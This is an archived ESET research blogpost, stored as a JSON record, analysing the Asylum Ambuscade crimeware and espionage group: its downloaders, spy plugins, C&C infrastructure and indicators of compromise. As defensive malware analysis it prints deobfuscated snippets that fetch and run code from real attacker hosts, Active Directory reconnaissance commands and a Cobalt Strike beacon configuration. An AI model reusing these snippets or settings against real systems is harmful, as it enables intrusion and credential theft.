{ "id": "f83cf4d7-e21d-4fd5-86aa-a7e4c864510c", "created_at": "2026-04-06T00:11:48.665679Z", "updated_at": "2026-04-10T03:37:04.1465Z", "deleted_at": null, "sha1_hash": "2da70f4bb602b1c894e4993169ed5eb99482e0a9", "title": "Asylum Ambuscade: crimeware or cyberespionage?", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1134014, "plain_text": "Asylum Ambuscade: crimeware or cyberespionage?\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 19:55:52 UTC\r\nAsylum Ambuscade is a cybercrime group that has been performing cyberespionage operations on the side. They were first\r\npublicly outed in March 2022 by Proofpoint researchers after the group targeted European government staff involved in\r\nhelping Ukrainian refugees, just a few weeks after the start of the Russia-Ukraine war. In this blogpost, we provide details\r\nabout the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.\r\nKey points of this blogpost:\r\nAsylum Ambuscade has been operating since at least 2020.\r\nIt is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North\r\nAmerica and Europe.\r\nAsylum Ambuscade also does espionage against government entities in Europe and Central Asia.\r\nMost of the group’s implants are developed in script languages such as AutoHotkey, JavaScript, Lua, Python, and\r\nVBS.\r\nCyberespionage campaigns\r\nAsylum Ambuscade has been running cyberespionage campaigns since at least 2020. We found previous compromises of\r\ngovernment officials and employees of state-owned companies in Central Asia countries and Armenia.\r\nIn 2022, and as highlighted in the Proofpoint publication, the group targeted government officials in several European\r\ncountries bordering Ukraine. We assess that the goal of the attackers was to steal confidential information and webmail\r\ncredentials from official government webmail portals.\r\nThe compromise chain starts with a spearphishing email that has a malicious Excel spreadsheet attachment. Malicious VBA\r\ncode therein downloads an MSI package from a remote server and installs SunSeed, a downloader written in Lua.\r\nNote that we observed some variations in the attachments. In June 2022, the group used an exploit of the Follina\r\nvulnerability (CVE-2022-30190) instead of malicious VBA code. This document is shown in Figure 1. It is written in\r\nUkrainian and the decoy is about a security alert regarding a Gamaredon (another well-known espionage group) attack in\r\nUkraine.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 1 of 15\n\nFigure 1. Document leveraging the Follina vulnerability\r\nThen, if the machine is deemed interesting, the attackers deploy the next stage: AHKBOT. This is a downloader written in\r\nAutoHotkey that can be extended with plugins, also written in AutoHotkey, in order to spy on the victim’s machine. An\r\nanalysis of the group’s toolset is provided later in the blogpost.\r\nCybercrime campaigns\r\nEven though the group came into the spotlight because of its cyberespionage operations, it has been mostly running\r\ncybercrime campaigns since early 2020.\r\nSince January 2022, we have counted more than 4,500 victims worldwide. While most of them are located in North\r\nAmerica, as shown in Figure 2, it should be noted that we have also seen victims in Asia, Africa, Europe, and South\r\nAmerica.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 2 of 15\n\nFigure 2. Geographical distribution of victims since January 2022\r\nThe targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses\r\n(SMBs) in various verticals.\r\nWhile the goal of targeting cryptocurrency traders is quite obvious – stealing cryptocurrency – we don’t know for sure how\r\nAsylum Ambuscade monetizes its access to SMBs. It is possible the group sells the access to other crimeware groups who\r\nmight, for example, deploy ransomware. We have not observed this in our telemetry, though.\r\nAsylum Ambuscade’s crimeware compromise chain is, overall, very similar to the one we describe for the cyberespionage\r\ncampaigns. The main difference is the compromise vector, which can be:\r\nA malicious Google Ad redirecting to a website delivering a malicious JavaScript file (as highlighted in this SANS\r\nblogpost)\r\nMultiple HTTP redirections in a Traffic Direction System (TDS). The TDS used by the group is referred to as 404\r\nTDS by Proofpoint. It is not exclusive to Asylum Ambuscade and we observed it was, for example, used by another\r\nthreat actor to deliver Qbot. An example of a redirection chain, captured by io, is shown in Figure 3.\r\nFigure 3. 404 TDS redirection chain, as captured by urlscan.io – numbers indicate the redirections in sequence\r\nIn addition to the different compromise vector, the group developed SunSeed equivalents in other scripting languages such\r\nas Tcl and VBS. In March 2023, it developed an AHKBOT equivalent in Node.js that we named NODEBOT. We believe\r\nthose changes were intended to bypass detections from security products. An overview of the compromise chain is provided\r\nin Figure 4.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 3 of 15\n\nFigure 4. Compromise chain\r\nAttribution\r\nWe believe that the cyberespionage and cybercrime campaigns are operated by the same group.\r\nThe compromise chains are almost identical in all campaigns. In particular, SunSeed and AHKBOT have been widely\r\nused for both cybercrime and cyberespionage.\r\nWe don’t believe that SunSeed and AHKBOT are sold on the underground market. These tools are not very\r\nsophisticated in comparison to other crimeware tools for sale, the number of victims is quite low were it a toolset\r\nshared among multiple groups, and the network infrastructure is consistent across campaigns.\r\nAs such, we believe that Asylum Ambuscade is a cybercrime group that is doing some cyberespionage on the side.\r\nWe also believe that these three articles describe incidents related to the group:\r\nA TrendMicro article from 2020: Credential Stealer Targets US, Canadian Bank Customers\r\nA Proofpoint article from 2022: Asylum Ambuscade: State Actor Uses Lua-based Sunseed Malware to Target\r\nEuropean Governments and Refugee Movement\r\nA Proofpoint article from 2023: Screentime: Sometimes It Feels Like Somebody's Watching Me\r\nMalicious JavaScript files\r\nIn most crimeware campaigns run by the group, the compromise vector is not a malicious document, but a JavaScript file\r\ndownloaded from the previously documented TDS. Note that it has to be manually executed by the victim, so the attackers\r\nare trying to entice people into clicking on the files by using filenames such as Document_12_dec-1532825.js,\r\nTeamViewer_Setup.js, or AnyDeskInstall.js.\r\nThose scripts are obfuscated using random variable names and junk code, most likely intended to bypass detections. An\r\nexample is provided in Figure 5.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 4 of 15\n\nFigure 5. Obfuscated JavaScript downloader\r\nOnce deobfuscated, this script can be summarized in two lines:\r\nvar obj = new ActiveXObject(\"windowsinstaller.installer\");\r\nobj.InstallProduct(\"https://namesilo.my[.]id/css/ke.msi\");\r\nFirst-stage downloaders\r\nThe first stage downloaders are dropped by an MSI package downloaded by either a malicious document or a JavaScript\r\nfile. There are three versions of this downloader:\r\nLua (SunSeed)\r\nTcl\r\nVBS\r\nSunSeed is a downloader written in the Lua language and heavily obfuscated, as shown in Figure 6.\r\nFigure 6. The SunSeed Lua variant is heavily obfuscated\r\nOnce manually deobfuscated, the main function of the script looks like this:\r\nrequire('socket.http')\r\nserial_number = Drive.Item('C').SerialNumber\r\nserver_response = socket.request(http://84.32.188[.]96/ + serial_number)\r\npcall(loadstring(server_response))\r\ncollectgarbage()\r\n\u003cjump to the start and retry\u003e\r\nIt gets the serial number of the C: drive and sends a GET request to http://\u003cC\u0026C\u003e/\u003cserial_number\u003e using the User-Agent\r\nLuaSocket 2.0.2. It then tries to execute the reply. This means that SunSeed expects to receive additional Lua scripts from\r\nthe C\u0026C server. We found two of those scripts: install and move.\r\ninstall is a simple Lua script that downloads an AutoHotkey script into C:\\ProgramData\\mscoree.ahk and the legitimate\r\nAutoHotkey interpreter into C:\\ProgramData\\mscoree.exe, as shown in Figure 7. This AutoHotkey script is AHKBOT, the\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 5 of 15\n\nsecond stage downloader.\r\nFigure 7. Lua script that downloads an AutoHotkey script\r\nAn even simpler Lua script, move, is shown in Figure 8. It is used to reassign management of a victimized computer from\r\none C\u0026C server to another. It is not possible to update the hardcoded SunSeed C\u0026C server; to complete a C\u0026C\r\nreassignment, a new MSI installer needs to be downloaded and executed, exactly as when the machine was first\r\ncompromised.\r\nFigure 8. Lua script to move management of a compromised machine from one C\u0026C server to another\r\nAs mentioned above, we found another variant of SunSeed developed using the Tcl language instead of Lua, as shown in\r\nFigure 9. The main difference is that it doesn’t send the C: drive’s serial number in the GET request.\r\nFigure 9. SunSeed variant in Tcl\r\nThe third variant was developed in VBS, as shown in Figure 10. The main difference is that it doesn’t download and\r\ninterpret additional code, but downloads and executes an MSI package.\r\nFigure 10. SunSeed variant in VBS\r\nSecond-stage downloaders\r\nThe main second-stage downloader is AHKBOT, developed in AutoHotkey. As shown in Figure 11, it sends a GET request,\r\nwith the User-Agent AutoHotkey (the default value used by AutoHotkey), to http://\u003cC\u0026C\u003e/\u003cserial_number_of_C_drive\u003e-\r\nRP, almost exactly as the earlier SunSeed. RP might be a campaign identifier, as it changes from sample to sample.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 6 of 15\n\nFigure 11. AHKBOT\r\nAHKBOT can be found on disk at various locations, such as C:\\ProgramData\\mscoree.ahk or C:\\ProgramData\\adb.ahk. It\r\ndownloads and interprets spy plugins, also developed in AutoHotkey. A summary of the 21 plugins is provided in Table 1.\r\nTable 1. SunSeed plugins\r\nPlugin name Description\r\nass\r\nDownload and execute a Cobalt Strike loader packed with VMProtect. The beacon’s configuration\r\nextracted using the tool CobaltStrikeParser is provided in the IoCs in the Cobalt Strike configuration\r\nsection.\r\nconnect Send the log message connected! to the C\u0026C server.\r\ndeletecookies\r\nDownload SQLite from /download?path=sqlite3slashsqlite3dotdll via HTTP from its C\u0026C server, then\r\ndelete browser cookies for the domains td.com (a Canadian bank) and mail.ru. We don’t know why the\r\nattackers need to delete cookies, especially for these domains. It’s possible it is intended to delete\r\nsession cookies to force its victims to reenter their credentials that would then be captured by the\r\nkeylogger.\r\ndeskscreen Take a screenshot using Gdip.BitmapFromScreen and send it to the C\u0026C server.\r\ndeskscreenon Similar to deskscreen but take screenshots in a 15-second loop.\r\ndeskscreenoff Stop the deskscreenon loop.\r\ndomain\r\nGather information about the Active Directory using the following commands:\r\ncmd /c chcp 65001 \u0026\u0026 net group \"domain admins\" /domain\r\ncmd /c chcp 65001 \u0026\u0026 net group \"enterprise admins\" /domain\r\ncmd /c chcp 65001 \u0026\u0026 net group \"\"Domain Computers\"\" /domain\r\ncmd /c chcp 65001 \u0026\u0026 nltest /dclist:\r\ncmd /c chcp 65001 \u0026\u0026 nltest /DOMAIN_TRUSTS\r\ncmd /c chcp 65001 \u0026\u0026 ipconfig /all\r\ncmd /c chcp 65001 \u0026\u0026 systeminfo\r\nhardware\r\nGet victim’s host information using WMI queries:\r\nSelect * from Win32_OperatingSystem\r\nSELECT * FROM Win32_LogicalDisk\r\nSELECT * FROM Win32_Processor\r\nSelect * from Win32_OperatingSystem\r\nSELECT * FROM Win32_VideoController\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 7 of 15\n\nPlugin name Description\r\nSelect * from Win32_NetworkAdapterConfiguration WHERE IPEnabled = True\r\nSelect * from FirewallProduct\r\nSelect * from AntiSpywareProduct\r\nSelect * from AntiVirusProduct\r\nSELECT * FROM Win32_Product\r\nSELECT Caption,ExecutablePath,ProcessID FROM Win32_Process where ExecutablePath is\r\nnot null\r\nand send to the C\u0026C server.\r\nhvncon\r\nDownload and execute a custom hVNC (hidden VNC) application from\r\nhttp://\u003cC\u0026C\u003e/download?path=hvncslashhvncdotzip\r\nhvncoff Stop the hVNC by executing taskkill /f /im hvnc.exe.\r\ninstallchrome\r\nDownload http://\u003cC\u0026C\u003e/download?path=chromeslashchromedotzip, a legitimate copy of Google\r\nChrome, and unpack it into %LocalAppData%\\Google\\Chrome\\Application. This copy of Chrome is\r\nlikely used by hVNC if the victim doesn’t have Chrome installed.\r\nkeylogon\r\nStart the keylogger, hooked input using DllCall(\"SetWindowsHookEx\", […]). The keystrokes are sent\r\nto the C\u0026C server when the active application changes.\r\nkeylogoff Stop the keylogger.\r\npasswords\r\nSteal passwords from Internet Explorer, Firefox, and Chromium-based browsers. It downloads SQLite\r\nto read the browser storages. It can also decrypt locally encrypted passwords by calling the Microsoft\r\nCryptUnprotectData function. Stolen passwords are sent to the C\u0026C server.\r\nThis plugin looks very similar to the password stealer described by Trend Micro in 2020, including the\r\nhard drive serial numbers used for debugging: 605109072 and 2786990575. This could indicate that it\r\nis still being developed on the same machines.\r\nrutservon\r\nDownload a remote access trojan (RAT) from http://\u003cC\u0026C\u003e/download?\r\npath=rutservslashagent6dot10dotexe (SHA-1:\r\n3AA8A4554B175DB9DA5EEB7824B5C047638A6A9D).\r\nThis is a commercial RAT developed by Remote Utilities LLC that provides full control over the\r\nmachine on which it is installed.\r\nrutservoff Kill the RAT.\r\nsteal Download and execute an infostealer – probably based on Rhadamanthys.\r\ntasklist List running processes by using the WMI query Select * from Win32_Process.\r\ntowake Move the mouse using MouseMove, 100, 100. This is likely to prevent the computer from going to\r\nsleep, especially given the name of the plugin.\r\nupdate\r\nDownload a new version of SunSeed AutoHotkey from the C\u0026C server and replace the current\r\nSunSeed on disk. The AutoHotkey interpreter is located in C:\\ProgramData\\adb.exe.\r\nwndlist List active windows by calling WinGet windows, List (Autohotkey syntax).\r\nThe plugins send the result back to the C\u0026C server using a log function, as shown in Figure 12.\r\nFigure 12. Log function\r\nIn March 2023, the attackers developed a variant of AHKBOT in Node.js that we have named NODEBOT – see Figure 13.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 8 of 15\n\nFigure 13. NODEBOT\r\nThe attackers also rewrote some AHKBOT plugins in JavaScript to make them compatible with NODEBOT. So far, we have\r\nobserved the following plugins (an asterisk indicates that the plugin is new to NODEBOT):\r\nconnect\r\ndeskscreen\r\nhardware\r\nhcmdon (a reverse shell in Node.js)*\r\nhvncoff\r\nhvncon\r\nkeylogoff\r\nkeylogon (download and execute the AutoHotkey keylogger)\r\nmods (download and install hVNC)*\r\npasswords\r\nscreen\r\nConclusion\r\nAsylum Ambuscade is a cybercrime group mostly targeting SMBs and individuals in North America and Europe. However,\r\nit appears to be branching out, running some recent cyberespionage campaigns on the side, against governments in Central\r\nAsia and Europe from time to time.\r\nIt is quite unusual to catch a cybercrime group running dedicated cyberespionage operations, and as such we believe that\r\nresearchers should keep close track of Asylum Ambuscade activities.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET\r\nThreat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 Filename ESET detection name Descr\r\n2B42FD41A1C8AC12221857DD2DF93164A71B95D7 ass.dll Win64/Packed.VMProtect.OX Cobal\r\nD5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8 M_suri antiinfla_ioniste Polonia.doc DOC/TrojanDownloader.Agent.AAP\r\nDocu\r\nvulne\r\n57157C5D3C1BB3EB3E86B24B1F4240C867A5E94F N/A Win32/TrojanDownloader.AutoHK.KH AHK\r\n7DB446B95D5198330B2B25E4BA6429C57942CFC9 N/A VBS/Agent.QOF Pytho\r\n5F67279C195F5E8A35A24CBEA76E25BAD6AB6E8E N/A VBS/TrojanDownloader.Agent.YDQ VBS\r\nC98061592DE61E34DA280AB179465580947890DE install.msi JS/Agent.QRI NOD\r\n519E388182DE055902C656B2D95CCF265A96CEAB Document_12_dec-1532825.js JS/TrojanDownloader.Agent.ZJM\r\nMalic\r\ndistrib\r\nAC3AFD14AD1AEA9E77A84C84022B4022DF1FC88B ahk Win32/Spy.AHK.AD AHK\r\n64F5AC9F0C6C12F2A48A1CB941847B0662734FBF ass Win32/TrojanDownloader.AHK.N AHK\r\n557C5150A44F607EC4E7F4D0C0ED8EE6E9D12ADF connect Win32/Spy.AHK.AD AHK\r\nF85B82805C6204F34DB0858E2F04DA9F620A0277 deletecookies Win32/Spy.AHK.AD AHK\r\n5492061DE582E71B2A5DA046536D4150F6F497F1 deskscreen Win32/Spy.AHK.AD AHK\r\nC554100C15ED3617EBFAAB00C983CED5FEC5DB11 deskscreenoff Win32/Spy.AHK.AD AHK\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 9 of 15\n\nSHA-1 Filename ESET detection name Descr\r\nAD8143DE4FC609608D8925478FD8EA3CD9A37C5D deskscreenon Win32/Spy.AHK.AD AHK\r\nF2948C27F044FC6FB4849332657801F78C0F7D5E domain Win32/TrojanDownloader.AutoHK.KH AHK\r\n7AA23E871E796F89C465537E6ECE962412CDA636 hardware Win32/Spy.AHK.AD AHK\r\n384961E19624437EB4EB22B1BF45953D7147FB8F hvncoff Win32/Spy.AHK.AD AHK\r\n7FDB9A73B3F13DBD94D392132D896A5328DACA59 hvncon Win32/Spy.AHK.AD AHK\r\n3E38D54CC55A48A3377A7E6A0800B09F2E281978 installchrome Win32/Spy.AHK.AD AHK\r\n7F8742778FC848A6FBCFFEC9011B477402544171 keylogoff Win32/Spy.AHK.AD AHK\r\n29604997030752919EA42B6D6CEE8D3AE28F527E keylogon Win32/Spy.AHK.AD AHK\r\n7A78AF75841C2A8D8A5929C214F08EB92739E9CB passwords Win32/Spy.AHK.AB AHK\r\n441369397D0F8DB755282739A05CB4CF52113C40 rutservoff Win32/Spy.AHK.AD AHK\r\n117ECFA95BE19D5CF135A27AED786C98EC8CE50B rutservon Win32/Spy.AHK.AD AHK\r\nD24A9C8A57C08D668F7D4A5B96FB7B5BA89D74C3 steal Win32/Spy.AHK.AE AHK\r\n95EDC096000C5B8DA7C8F93867F736928EA32575 towake Win32/Spy.AHK.AD AHK\r\n62FA77DAEF21772D599F2DC17DBBA0906B51F2D9 update Win32/Spy.AHK.AD AHK\r\nA9E3ACFE029E3A80372C0BB6B7C500531D09EDBE wndlist Win32/Spy.AHK.AD AHK\r\nEE1CFEDD75CBA9028904C759740725E855AA46B5 tasklist Win32/Spy.AHK.AD AHK\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n5.39.222[.]150 N/A Hostkey_NL abuse, ORG-HB14-RIPE February 27, 2022 C\u0026C server.\r\n5.44.42[.]27 snowzet[.]com\r\nGLOBAL INTERNET SOLUTIONS\r\nLLC\r\nDecember 7, 2022 Cobalt Strike C\u0026C server.\r\n5.230.68[.]137 N/A GHOSTnet GmbH September 5, 2022 C\u0026C server.\r\n5.230.71[.]166 N/A GHOSTnet GmbH August 17, 2022 C\u0026C server.\r\n5.230.72[.]38 N/A GHOSTnet GmbH September 24, 2022 C\u0026C server.\r\n5.230.72[.]148 N/A GHOSTnet GmbH September 26, 2022 C\u0026C server.\r\n5.230.73[.]57 N/A GHOSTnet GmbH August 9, 2022 C\u0026C server.\r\n5.230.73[.]63 N/A GHOSTnet GmbH June 2, 2022 C\u0026C server.\r\n5.230.73[.]241 N/A GHOSTnet GmbH August 20, 2022 C\u0026C server.\r\n5.230.73[.]247 N/A GHOSTnet GmbH August 9, 2022 C\u0026C server.\r\n5.230.73[.]248 N/A GHOSTnet GmbH June 1, 2022 C\u0026C server.\r\n5.230.73[.]250 N/A GHOSTnet GmbH June 2, 2022 C\u0026C server.\r\n5.252.118[.]132 N/A aezagroup March 1, 2023 C\u0026C server.\r\n5.252.118[.]204 N/A aezagroup March 1, 2023 C\u0026C server.\r\n5.255.88[.]222 N/A Serverius May 28, 2022 C\u0026C server.\r\n23.106.123[.]119 N/A IRT-LSW-SG February 4, 2022 C\u0026C server.\r\n31.192.105[.]28 N/A HOSTKEY B.V. February 23, 2022 C\u0026C server.\r\n45.76.211[.]131 N/A The Constant Company, LLC January 19, 2023 C\u0026C server.\r\n45.77.185[.]151 N/A Vultr Holdings, LLC December 16, 2022 C\u0026C server.\r\n45.132.1[.]238 N/A Miglovets Egor Andreevich November 7, 2022 C\u0026C server.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 10 of 15\n\nIP Domain Hosting provider First seen Details\r\n45.147.229[.]20 N/A COMBAHTON January 22, 2022 C\u0026C server.\r\n46.17.98[.]190 N/A Hostkey_NL abuse, ORG-HB14-RIPE August 31, 2020 C\u0026C server.\r\n46.151.24[.]197 N/A Hosting technology LTD January 1, 2023 C\u0026C server.\r\n46.151.24[.]226 N/A Hosting technology LTD December 23, 2022 C\u0026C server.\r\n46.151.25[.]15 N/A Hosting technology LTD December 27, 2022 C\u0026C server.\r\n46.151.25[.]49 N/A Podolsk Electrosvyaz Ltd. December 29, 2022 C\u0026C server.\r\n46.151.28[.]18 N/A Hosting technology LTD January 1, 2023 C\u0026C server.\r\n51.83.182[.]153 N/A OVH March 8, 2022 C\u0026C server.\r\n51.83.189[.]185 N/A OVH March 5, 2022 C\u0026C server.\r\n62.84.99[.]195 N/A VDSINA-NL March 27, 2023 C\u0026C server.\r\n62.204.41[.]171 N/A HORIZONMSK-AS December 12, 2022 C\u0026C server.\r\n77.83.197[.]138 N/A HZ-UK-AS March 7, 2022 C\u0026C server.\r\n79.137.196[.]121 N/A AEZA GROUP Ltd March 1, 2023 C\u0026C server.\r\n79.137.197[.]187 N/A aezagroup December 1, 2022 C\u0026C server.\r\n80.66.88[.]155 N/A\r\nXHOST INTERNET SOLUTIONS\r\nLP\r\nFebruary 24, 2022 C\u0026C server.\r\n84.32.188[.]29 N/A UAB Cherry Servers January 10, 2022 C\u0026C server.\r\n84.32.188[.]96 N/A UAB Cherry Servers January 29, 2022 C\u0026C server.\r\n85.192.49[.]106 N/A Hosting technology LTD December 25, 2022 C\u0026C server.\r\n85.192.63[.]13 N/A AEZA GROUP Ltd December 27, 2022 C\u0026C server.\r\n85.192.63[.]126 N/A aezagroup March 5, 2023 C\u0026C server.\r\n85.239.60[.]40 N/A Clouvider April 30, 2022 C\u0026C server.\r\n88.210.10[.]62 N/A Hosting technology LTD December 12, 2022 C\u0026C server.\r\n89.41.182[.]94 N/A Abuse-C Role, ORG-HS136-RIPE September 3, 2021 C\u0026C server.\r\n89.107.10[.]7 N/A Miglovets Egor Andreevich December 4, 2022 C\u0026C server.\r\n89.208.105[.]255 N/A AEZA GROUP Ltd December 22, 2022 C\u0026C server.\r\n91.245.253[.]112 N/A M247 Europe March 4, 2022 C\u0026C server.\r\n94.103.83[.]46 N/A Hosting technology LTD December 11, 2022 C\u0026C server.\r\n94.140.114[.]133 N/A NANO-AS March 8, 2022 C\u0026C server.\r\n94.140.114[.]230 N/A NANO-AS April 13, 2022 C\u0026C server.\r\n94.140.115[.]44 N/A NANO-AS April 1, 2022 C\u0026C server.\r\n94.232.41[.]96 N/A\r\nXHOST INTERNET SOLUTIONS\r\nLP\r\nOctober 2, 2022 C\u0026C server.\r\n94.232.41[.]108 N/A\r\nXHOST INTERNET SOLUTIONS\r\nLP\r\nAugust 19, 2022 C\u0026C server.\r\n94.232.43[.]214 N/A XHOST-INTERNET-SOLUTIONS October 10, 2022 C\u0026C server.\r\n98.142.251[.]26 N/A BlueVPS OU April 29, 2022 C\u0026C server.\r\n98.142.251[.]226 N/A BlueVPS OU April 12, 2022 C\u0026C server.\r\n104.234.118[.]163 N/A IPXO LLC March 1, 2023 C\u0026C server.\r\n104.248.149[.]122 N/A DigitalOcean, LLC December 11, 2022 C\u0026C server.\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 11 of 15\n\nIP Domain Hosting provider First seen Details\r\n109.107.173[.]72 N/A Hosting technology LTD January 20, 2023 C\u0026C server.\r\n116.203.252[.]67 N/A\r\nHetzner Online GmbH - Contact Role,\r\nORG-HOA1-RIPE March 5, 2022 C\u0026C server.\r\n128.199.82[.]141 N/A Digital Ocean December 11, 2022 C\u0026C server.\r\n139.162.116[.]148 N/A Akamai Connected Cloud March 3, 2022 C\u0026C server.\r\n141.105.64[.]121 N/A HOSTKEY B.V. March 21, 2022 C\u0026C server.\r\n146.0.77[.]15 N/A Hostkey_NL April 10, 2022 C\u0026C server.\r\n146.70.79[.]117 N/A M247 Ltd March 2, 2022 C\u0026C server.\r\n157.254.194[.]225 N/A Tier.Net Technologies LLC March 1, 2023 C\u0026C server.\r\n157.254.194[.]238 N/A Tier.Net Technologies LLC March 13, 2023 C\u0026C server.\r\n172.64.80[.]1 namesilo.my[.]id Cloudflare, Inc. December 14, 2022 C\u0026C server.\r\n172.86.75[.]49 N/A BL Networks May 17, 2021 C\u0026C server.\r\n172.104.94[.]104 N/A Linode March 5, 2022 C\u0026C server.\r\n172.105.235[.]94 N/A Linode April 5, 2022 C\u0026C server.\r\n172.105.253[.]139 N/A Akamai Connected Cloud March 3, 2022 C\u0026C server.\r\n176.124.214[.]229 N/A VDSINA-NL December 26, 2022 C\u0026C server.\r\n176.124.217[.]20 N/A Hosting technology LTD March 2, 2023 C\u0026C server.\r\n185.70.184[.]44 N/A Hostkey_NL April 12, 2021 C\u0026C server.\r\n185.82.126[.]133 N/A Sia Nano IT March 12, 2022 C\u0026C server.\r\n185.123.53[.]49 N/A BV-EU-AS March 14, 2022 C\u0026C server.\r\n185.150.117[.]122 N/A UAB Cherry Servers April 2, 2021 C\u0026C server.\r\n185.163.45[.]221 N/A MivoCloud SRL January 2, 2023 C\u0026C server.\r\n193.109.69[.]52 N/A Hostkey_NL November 5, 2021 C\u0026C server.\r\n193.142.59[.]152 N/A HostShield LTD Admin November 17, 2022 C\u0026C server.\r\n193.142.59[.]169 N/A ColocationX Ltd. November 8, 2022 C\u0026C server.\r\n194.180.174[.]51 N/A MivoCloud SRL December 24, 2022 C\u0026C server.\r\n195.2.81[.]70 N/A Hosting technology LTD September 27, 2022 C\u0026C server.\r\n195.133.196[.]230 N/A JSC Mediasoft ekspert July 15, 2022 C\u0026C server.\r\n212.113.106[.]27 N/A AEZA GROUP Ltd January 28, 2023 C\u0026C server.\r\n212.113.116[.]147 N/A JY Mobile Communications March 1, 2023 C\u0026C server.\r\n212.118.43[.]231 N/A Hosting technology LTD March 1, 2023 C\u0026C server.\r\n213.109.192[.]230 N/A BV-EU-AS June 1, 2022 C\u0026C server.\r\nCobalt Strike configuration\r\nBeaconType - HTTP\r\nPort - 80\r\nSleepTime - 45000\r\nMaxGetSize - 2801745\r\nJitter - 37\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - e4394d2667cc8f9d0af0bbde9e808c29\r\nC2Server - snowzet[.]com,/jquery-3.3.1.min.js\r\nUserAgent - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Tri\r\nHttpPostUri - /jquery-3.3.2.min.js\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 12 of 15\n\nMalleable_C2_Instructions - Remove 1522 bytes from the end\r\n Remove 84 bytes from the beginning\r\n Remove 3931 bytes from the beginning\r\n Base64 URL-safe decode\r\n XOR mask w/ random key\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n Metadata\r\n base64url\r\n prepend \"__cfduid=\"\r\n header \"Cookie\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n SessionId\r\n mask\r\n base64url\r\n parameter \"__cfduid\"\r\n Output\r\n mask\r\n base64url\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost.exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark - 206546002\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - True\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nhttps://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/\r\nPage 13 of 15\n\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 13 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1583.003\r\nAcquire Infrastructure:\r\nVirtual Private Server\r\nAsylum Ambuscade rented VPS servers.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nAsylum Ambuscade develops custom implants in\r\nvarious scripting languages.\r\nInitial Access\r\nT1189 Drive-by Compromise\r\nTargets were redirected via a TDS to a website\r\ndelivering a malicious JavaScript file.\r\nT1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nTargets receive malicious Excel or Word documents.\r\nExecution\r\nT1059.005\r\nCommand and Scripting\r\nInterpreter: Visual Basic\r\nAsylum 